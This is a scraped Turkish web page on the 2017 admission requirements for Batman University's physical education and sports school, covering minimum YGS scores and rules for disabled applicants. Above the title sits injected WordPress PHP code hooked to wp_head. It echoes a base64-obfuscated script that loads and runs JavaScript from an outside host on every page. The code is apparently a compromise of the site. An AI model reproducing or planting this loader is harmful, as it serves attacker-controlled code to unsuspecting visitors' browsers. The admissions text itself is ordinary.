function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); Batman Üniversitesi Besyo Sınavı 2017 – Besyo Hakkında Güncel Bilgiler

Batman Üniversitesi Besyo Sınavı 2017

İnstagram Takip Twitter

Beden Eğitimi ve Spor Yüksekokulu Bölümlerine başvuruda bulunabilmek için; tüm lise mezunları 2017 yılı YGS sınavında puan türlerinin herhangi birinden Beden Eğitimi ve Spor Öğretmenliği Bölümü için en az 200 puan, Spor Yöneticiliği Bölümü ve Antrenörlük Eğitimi bölümleri için en az 190 puan almış olmak, spor liseleri ile liselerin spor alan/kol/bölümlerinden mezun olan adaylar ve Milli sporcular için en az birinden 150 puan almış olmak şartı aranır.

NOT 1: Engelli Adaylar: Spor yöneticiliği I. ve II. Öğretime alınacak engelli öğrenciler, diğer adaylar gibi başvuru işlemlerini şahsen yapacaklardır ve başvuru için yukarıda istenilen tüm belgeleri sunacaklardır. Ayrıca adayların sağlık raporlarında engellilik oranları belirtilmiş olmalıdır. Engelli adaylar varsa; millilik belgelerini ve sporcu özgeçmişlerini başvuru sırasında dosyalarında belgelendirmek zorundadırlar. Adaylar, koordinasyon sınavına tabi tutulmayacak, YGS, Ortaöğretim Başarı puanı, sporcu özgeçmişleri ve mülakata tabi tutularak değerlendirmeye alınacaklardır. Yeterli başvuru yapılmadığı takdirde boş kalan kontenjanlar sınav komisyonunun uygun gördüğü kontenjanlara aktarılacaktır.

Batman Kılavuz

 

0

Bir Cevap Yazın

Menü